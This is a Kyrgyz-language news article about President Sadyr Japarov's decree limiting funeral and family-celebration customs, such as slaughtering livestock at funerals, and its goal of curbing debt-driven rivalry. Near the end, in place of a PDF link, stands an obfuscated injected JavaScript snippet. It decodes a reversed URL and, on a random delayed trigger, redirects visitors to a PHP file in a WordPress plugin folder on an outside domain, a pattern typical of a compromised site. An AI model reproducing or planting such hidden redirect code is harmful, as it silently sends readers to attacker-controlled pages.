Адаттан арыла алабызбы?

1-март, 2022-ж. / Редакция / Жаңылыктар 49

Мамлекет башчысы Садыр Жапаров «Кыргыз Республикасында үй-бүлөлүк салтанаттарды жана маркумду эскерүү үрп-адаттарын тартипке келтирүү боюнча чаралар жөнүндө» Жарлыгын чыгарды. 

Жарлыктын негизинде колунда бары жана жогуна карабастан өлүм чыккан жерде мал союуга тыюу салынгандыгын жалпы коомчулук колдоп-кубатташууда. Президент Садыр Жапаровдун Жарлыгынын негизги максаты – биринчиден эрегишке тыюу  салуу болсо, экинчиден карапайым эл колунда болгон оокатын сөөк узатууга сарптап салуусунун ордуна жашоо-турмушун жакшыртып алышына аз да болсо себеп болуу.

Президент Садыр Жапаровдун социалдык баракчасында келтирген жүйөөсү анык эмеспи. Өлүм чыккан үйдө катар-катары менен бодо мал союлуп, кадимкидей той болуп жаткандай сезилет. Колунда жоктору куру намыска алдырып, эптеп карызга же насыяга болсо да бир бодо мал таап союшат. А колунда барлары бештен бодо мал сойгон учурларын көрүп эле жүрөбүз. Дасторкондун үстүн да кадимкидей тойдогудай «титиретип» жасашат. Келген-кеткендер да каза тапкан адамдын жашоо шартын жана балдарынын турмушун союлган малдын санына жараша баа беришет. “Каргага теңелип каздын буту сыныптыр” дегендей колунда жоктор куру намыска алдырышып карыздап мал алып, андан кутула албай кайгыга баткан учурлары жок эмес. “Кедейлик кемтик эмес” дейт. Колунда болбогон соң, ашынган байларга эрегишип эмне дейсиң. Бирок, мындай атаандашуу же куру намыс эч пайда алып келбей тургандыгын ар бирибиз түшүнүп турсак да, токтото албадык. Канча айтылып келген менен мамлекеттик деңгээлде чечим кабыл алынып, катуу көзөмөл болбоду. Эми мамлекет башчысы бул Жарлыктын аткарылышын камсыз кыла албаган мамлекеттик жана муниципалдык кызматкерлери жооп берээрин эскертти. Чындыгында мындай катуу көзөмөл болмоюнча коомчулукта адат болуп калган көрүнүштү тыюу оңой эмес. Эл арасында нааразычылыкты жараткан мындай орчундуу маселени жоюуда ар бирибиз жалпы эрежеге баш ийүүбүз кажет. Анткени, Жарлыктын маани-маңызы эрегишти токтотуп, андан көрө тапкан-ташыганыбызды жашоо-турмушубуздун жакшырышына жумшоого себеп болуу болуп жатпайбы. Көпчүлүк эл колдоп жаткан Жарлыктын аткарылышы эми  жергиликтүү бийликтегилердин колунда. Мамлекет башчысы Ак үйдөгүлөрдөн тартып мектептин директорлору, укук коргоо органдарынын кызматкерлери, айыл өкмөт, райондук мекемелердин жетекчилери, райондун акимине чейин элге түшүндүрүү иштерин жүргүзүп, жакындары же туугандары каза болгон үйдү катуу көзөмөлгө алууну тапшырды.

 $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/03/01_03-1.pdf»>2022-жылдын 1-марты

Жылдыз ДЫЙКАНОВА

1-март, 2022-ж. / Редакция / Жаңылыктар 49
Бөлүшүү: Telegram WhatsApp X